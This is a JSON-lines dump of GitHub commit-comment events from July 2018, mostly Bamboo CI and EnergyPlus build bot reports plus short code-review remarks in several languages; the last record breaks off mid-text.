{"id":"7945567505","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661115,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-10T18:21:30Z","updated_at":"2018-07-10T18:21:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:21:30Z"}
{"id":"7945569023","type":"CommitCommentEvent","actor":{"login":"JohnMH"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29661117,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-10T18:21:49Z","updated_at":"2018-07-10T18:21:49Z","author_association":"OWNER","body":"@albfan I do not currently have a copy of this repository on my GitLab instance, however I will definitely put information here pointing to the repository when I can continue development on this project."}},"created_at":"2018-07-10T18:21:49Z"}
{"id":"7945569521","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29661118,"position":2,"line":2,"path":"Lesson 3/Station.rb","commit_id":"df7bf04e61a88f692993158f49fb328a67524fd2","created_at":"2018-07-10T18:21:56Z","updated_at":"2018-07-10T18:21:56Z","author_association":"NONE","body":"про \"стейшен нейм\" смотри выше"}},"created_at":"2018-07-10T18:21:56Z"}
{"id":"7945573068","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661124,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-10T18:22:42Z","updated_at":"2018-07-10T18:22:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:22:42Z"}
{"id":"7945575183","type":"CommitCommentEvent","actor":{"login":"Sadjuuk"},"repo":{"name":"Sadjuuk/Repository_test"},"payload":{"comment":{"id":29661128,"position":null,"line":null,"path":null,"commit_id":"0222e55c73382435f885a7a56b21b1ce1c5da560","created_at":"2018-07-10T18:23:06Z","updated_at":"2018-07-10T18:23:06Z","author_association":"OWNER","body":"Back"}},"created_at":"2018-07-10T18:23:06Z"}
{"id":"7945578639","type":"CommitCommentEvent","actor":{"login":"mancoast"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29661138,"position":null,"line":null,"path":null,"commit_id":"4dc59edd4e8a1412a476c21f4731f80df9b06c2d","created_at":"2018-07-10T18:23:47Z","updated_at":"2018-07-10T18:23:47Z","author_association":"COLLABORATOR","body":"changes to mesh_export.cpp, im on the edge of my seat for gpu meshes\n\nOn Tue, Jul 10, 2018 at 1:32 PM Krzysztof Marczak <notifications@github.com>\nwrote:\n\n> Everything is ok. Probably you did some changes in the same time as I made\n> changes in mesh_export.cpp.\n> You just merged mych changes with your local version.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/buddhi1980/mandelbulber2/commit/4dc59edd4e8a1412a476c21f4731f80df9b06c2d#commitcomment-29660520>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGtt7ed9RwsuroFQI8FEk01FpD7I-3z_ks5uFOUygaJpZM4VI-Jm>\n> .\n>\n"}},"created_at":"2018-07-10T18:23:47Z"}
{"id":"7945578739","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29661139,"position":null,"line":null,"path":null,"commit_id":"d24f4fce0fe6b970b702d6719aba7e533a2fba83","created_at":"2018-07-10T18:23:49Z","updated_at":"2018-07-10T18:23:49Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (RKStrand) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d24f4fce0fe6b970b702d6719aba7e533a2fba83-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T18:23:49Z"}
{"id":"7945579329","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661140,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-10T18:23:55Z","updated_at":"2018-07-10T18:23:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:23:55Z"}
{"id":"7945603894","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661206,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-10T18:28:41Z","updated_at":"2018-07-10T18:28:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:28:41Z"}
{"id":"7945609870","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661214,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-10T18:29:52Z","updated_at":"2018-07-10T18:29:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:29:52Z"}
{"id":"7945610744","type":"CommitCommentEvent","actor":{"login":"randalldfloyd"},"repo":{"name":"IUBLibTech/catorax"},"payload":{"comment":{"id":29661217,"position":null,"line":null,"path":null,"commit_id":"2ac84fea7b45275b10737f5d4219912beabac9d6","created_at":"2018-07-10T18:30:02Z","updated_at":"2018-07-10T18:30:02Z","author_association":"CONTRIBUTOR","body":"In the code above, 'SpecialImage' is a Work Type inheriting and mixing in behaviors from the 'Image' Work Type.  A generator that can produce a new type based on an existing valid \"archetype\" would have to generate code above where the 'Image' type would be substituted for whatever type was specified.  "}},"created_at":"2018-07-10T18:30:02Z"}
{"id":"7945616433","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661229,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-10T18:31:05Z","updated_at":"2018-07-10T18:31:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:31:05Z"}
{"id":"7945621442","type":"CommitCommentEvent","actor":{"login":"computersforpeace"},"repo":{"name":"andersson/rmtfs"},"payload":{"comment":{"id":29661242,"position":null,"line":null,"path":null,"commit_id":"b3ea7fdf7b33bf1d9b225db41dcfb2041dd76ae0","created_at":"2018-07-10T18:32:06Z","updated_at":"2018-07-10T18:32:06Z","author_association":"CONTRIBUTOR","body":"'unsigned long' is still not guaranteed big enough. If one is running 32-bit user space, 'unsigned long' is often 32-bit. But the phys address space might be 64-bit still."}},"created_at":"2018-07-10T18:32:06Z"}
{"id":"7945622389","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661246,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-10T18:32:18Z","updated_at":"2018-07-10T18:32:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:32:18Z"}
{"id":"7945623202","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29661250,"position":13,"line":27,"path":"Lesson 3/train.rb","commit_id":"df7bf04e61a88f692993158f49fb328a67524fd2","created_at":"2018-07-10T18:32:28Z","updated_at":"2018-07-10T18:32:28Z","author_association":"NONE","body":"[вот тут](https://github.com/aleksandrrusev/thinknetica/commit/0c26618ffcfa0e256e255abefd3263f3f2f3e0b5#diff-3e6f457a218d3f21ce2783d32bf46e33) уже писал, что тернарники нужно убрать\r\nони здесь ни к месту и усложняют чтение кода\r\n"}},"created_at":"2018-07-10T18:32:28Z"}
{"id":"7945624255","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29661252,"position":13,"line":27,"path":"Lesson 3/train.rb","commit_id":"df7bf04e61a88f692993158f49fb328a67524fd2","created_at":"2018-07-10T18:32:41Z","updated_at":"2018-07-10T18:32:41Z","author_association":"NONE","body":"это про строки 22, 26"}},"created_at":"2018-07-10T18:32:41Z"}
{"id":"7945628240","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661260,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-10T18:33:30Z","updated_at":"2018-07-10T18:33:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:33:30Z"}
{"id":"7945628538","type":"CommitCommentEvent","actor":{"login":"d97hah"},"repo":{"name":"clld/glottolog"},"payload":{"comment":{"id":29661262,"position":null,"line":null,"path":null,"commit_id":"9dd67fdfaaca4b9280629d7119e4fc52fe23d363","created_at":"2018-07-10T18:33:33Z","updated_at":"2018-07-10T18:33:33Z","author_association":"CONTRIBUTOR","body":"I am ready to hold on to 2.7 fo at least another 10 years :-)\n\nPada tanggal Sel, 10 Jul 2018 pukul 20.16 Robert Forkel <\nnotifications@github.com> menulis:\n\n> @xflr6 <https://github.com/xflr6> on my new laptop I'm finally on py3! So\n> if you don't expect @d97hah <https://github.com/d97hah> to use treedb,\n> you can switch to py3 only :)\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/clld/glottolog/commit/9dd67fdfaaca4b9280629d7119e4fc52fe23d363#commitcomment-29661062>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADUDyKHsvx5FfvvIYZJzjpAkxmR5AV0Eks5uFO-UgaJpZM4VJ48f>\n> .\n>\n"}},"created_at":"2018-07-10T18:33:33Z"}
{"id":"7945631201","type":"CommitCommentEvent","actor":{"login":"SamAsEnd"},"repo":{"name":"Yididya/amharic_spell_corrector"},"payload":{"comment":{"id":29661270,"position":null,"line":null,"path":null,"commit_id":"6eb84ef5919302e2aab5291e0b236229324fdd57","created_at":"2018-07-10T18:34:08Z","updated_at":"2018-07-10T18:34:08Z","author_association":"NONE","body":"I have created the file in this pr #1 \r\n\r\nfeel free to contribute to my project too ..."}},"created_at":"2018-07-10T18:34:08Z"}
{"id":"7945631253","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29661271,"position":null,"line":null,"path":null,"commit_id":"5a3db3d4a3c09e59041dd0e9b5caf61cc0d71e6a","created_at":"2018-07-10T18:34:08Z","updated_at":"2018-07-10T18:34:08Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-grid](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-grid).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-grid-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-10T18:34:08Z"}
{"id":"7945631638","type":"CommitCommentEvent","actor":{"login":"CharliePoole"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29661273,"position":null,"line":null,"path":null,"commit_id":"2e19b4e99144ce1c9437b4e9a03987987b9aaf64","created_at":"2018-07-10T18:34:12Z","updated_at":"2018-07-10T18:34:12Z","author_association":"MEMBER","body":"So what does `SERIALIZABLE` mean? Is it listed in our standard defines with a definition? Could the name be made a bit clearer? (I'm guessing it means \"platform has SerializableAttribute\" but I'm not sure.)\r\n\r\nI've always wished we could put a C# `#define` inside an `#if`. Back in the day, working in C++, I would use a single platform define to specify multiple feature defines. Unfortunately, that's not available."}},"created_at":"2018-07-10T18:34:12Z"}
{"id":"7945633251","type":"CommitCommentEvent","actor":{"login":"wentasah"},"repo":{"name":"Shanigen/kcf"},"payload":{"comment":{"id":29661276,"position":48,"line":43,"path":"README.md","commit_id":"07c8a61bab9c1a6b41986df2d04922a3887777f7","created_at":"2018-07-10T18:34:32Z","updated_at":"2018-07-10T18:34:32Z","author_association":"COLLABORATOR","body":"This description is too difficult to understand. You should simplify it. Maybe, it's difficult, because the implementation is difficult and in that case, the implementation should be simplified."}},"created_at":"2018-07-10T18:34:32Z"}
{"id":"7945633290","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29661277,"position":13,"line":27,"path":"Lesson 3/train.rb","commit_id":"df7bf04e61a88f692993158f49fb328a67524fd2","created_at":"2018-07-10T18:34:33Z","updated_at":"2018-07-10T18:34:33Z","author_association":"NONE","body":"что-то мне кажется ты вообще по этому классу не очень читал комментарии\r\nили не запушил его?\r\nисправлений я не вижу )"}},"created_at":"2018-07-10T18:34:33Z"}
{"id":"7945633935","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661278,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-10T18:34:41Z","updated_at":"2018-07-10T18:34:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:34:41Z"}
{"id":"7945637579","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29661284,"position":null,"line":null,"path":null,"commit_id":"e8838d4a7309729c9953f6c4c52db6fa7ea843bc","created_at":"2018-07-10T18:35:24Z","updated_at":"2018-07-10T18:35:24Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-MacOS-10.9-clang: OK (2931 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8838d4a7309729c9953f6c4c52db6fa7ea843bc-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8838d4a7309729c9953f6c4c52db6fa7ea843bc-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T18:35:24Z"}
{"id":"7945638968","type":"CommitCommentEvent","actor":{"login":"SolomonShorser-OICR"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29661287,"position":4,"line":46,"path":"orthoinference/src/main/java/org/reactome/orthoinference/GenerateInstance.java","commit_id":"23d1d7431a427f879f1d42c7057422866e70f207","created_at":"2018-07-10T18:35:39Z","updated_at":"2018-07-10T18:35:39Z","author_association":"MEMBER","body":"AAAAAAAH! :fearful: \r\n\r\n;)"}},"created_at":"2018-07-10T18:35:39Z"}
{"id":"7945639943","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661289,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-10T18:35:52Z","updated_at":"2018-07-10T18:35:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:35:52Z"}
{"id":"7945640969","type":"CommitCommentEvent","actor":{"login":"leofeyer"},"repo":{"name":"contao/core-bundle"},"payload":{"comment":{"id":29661292,"position":13,"line":951,"path":"src/Resources/contao/drivers/DC_Table.php","commit_id":"e45c20cc5c5b642ae0b17bc413275efc9836062e","created_at":"2018-07-10T18:36:05Z","updated_at":"2018-07-10T18:36:05Z","author_association":"MEMBER","body":"Only if you were lucky enough not to run into one of the many issues the old implementation had (e.g. https://github.com/contao/core/issues/2938)."}},"created_at":"2018-07-10T18:36:05Z"}
{"id":"7945641238","type":"CommitCommentEvent","actor":{"login":"lizmat"},"repo":{"name":"MoarVM/MoarVM"},"payload":{"comment":{"id":29661293,"position":4,"line":47,"path":"src/core/oplist","commit_id":"e838ff93c9618dab840b5de3ec3548f0eb501ee1","created_at":"2018-07-10T18:36:09Z","updated_at":"2018-07-10T18:36:09Z","author_association":"CONTRIBUTOR","body":"Fixed."}},"created_at":"2018-07-10T18:36:09Z"}
{"id":"7945643389","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29661294,"position":29,"line":29,"path":"HomeWork4/HW4Task1/src/com/MinMax.java","commit_id":"acbf3dec961662a08ef479a072db4f44a78016d0","created_at":"2018-07-10T18:36:35Z","updated_at":"2018-07-10T18:36:35Z","author_association":"OWNER","body":"замість\r\nelse {\r\n\t\t\treturn 0; \r\n}\r\nможна просто \r\nreturn 0; "}},"created_at":"2018-07-10T18:36:35Z"}
{"id":"7945644284","type":"CommitCommentEvent","actor":{"login":"techgique"},"repo":{"name":"CDRH/data"},"payload":{"comment":{"id":29661295,"position":15,"line":179,"path":"config/api_schema.yml","commit_id":"c215bac7f84ba82dcc68a09a1e9d65dfef31b7e1","created_at":"2018-07-10T18:36:46Z","updated_at":"2018-07-10T18:36:46Z","author_association":"MEMBER","body":"but... ? o.O"}},"created_at":"2018-07-10T18:36:46Z"}
{"id":"7945645643","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661298,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-10T18:37:02Z","updated_at":"2018-07-10T18:37:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-10T18:37:02Z"}
{"id":"7945646750","type":"CommitCommentEvent","actor":{"login":"phongleq"},"repo":{"name":"hackiftekhar/IQKeyboardManager"},"payload":{"comment":{"id":29661300,"position":null,"line":null,"path":null,"commit_id":"9bb0f564c95fd6f015775c289f4d228658c006de","created_at":"2018-07-10T18:37:16Z","updated_at":"2018-07-10T18:37:16Z","author_association":"NONE","body":"Hmm weird I've just updated and it now seems to work. "}},"created_at":"2018-07-10T18:37:16Z"}
{"id":"7945647797","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29661302,"position":27,"line":27,"path":"HomeWork4/HW4Task1/src/com/Range.java","commit_id":"acbf3dec961662a08ef479a072db4f44a78016d0","created_at":"2018-07-10T18:37:28Z","updated_at":"2018-07-10T18:37:28Z","author_association":"OWNER","body":"тут можна просто\r\nreturn number>=-5 && number<=5;\r\n"}},"created_at":"2018-07-10T18:37:28Z"}
{"id":"7945649633","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29661304,"position":66,"line":66,"path":"Lesson 3/train.rb","commit_id":"0c26618ffcfa0e256e255abefd3263f3f2f3e0b5","created_at":"2018-07-10T18:37:50Z","updated_at":"2018-07-10T18:37:50Z","author_association":"NONE","body":"потому что если предыдущей станции нет, то двигаться на нее нельзя )) именно это я тебе и предложил проверить (см. код в моем комменте)\r\nесли предыдущей станции нет, то метод вернет \"нил\" и проверка не выполнится\r\n"}},"created_at":"2018-07-10T18:37:50Z"}
{"id":"7945649830","type":"CommitCommentEvent","actor":{"login":"CarolineChaudey"},"repo":{"name":"CarolineChaudey/BombermanClient"},"payload":{"comment":{"id":29661305,"position":null,"line":null,"path":null,"commit_id":"c241febb17429146ca5b8474328d2c1024e6e3fc","created_at":"2018-07-10T18:37:52Z","updated_at":"2018-07-10T18:37:52Z","author_association":"OWNER","body":"C'est le game engine qui demande les données au serveur et qui les envoie au menu."}},"created_at":"2018-07-10T18:37:52Z"}
{"id":"7945651635","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29661311,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-10T18:38:13Z","updated_at":"2018-07-10T18:38:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment 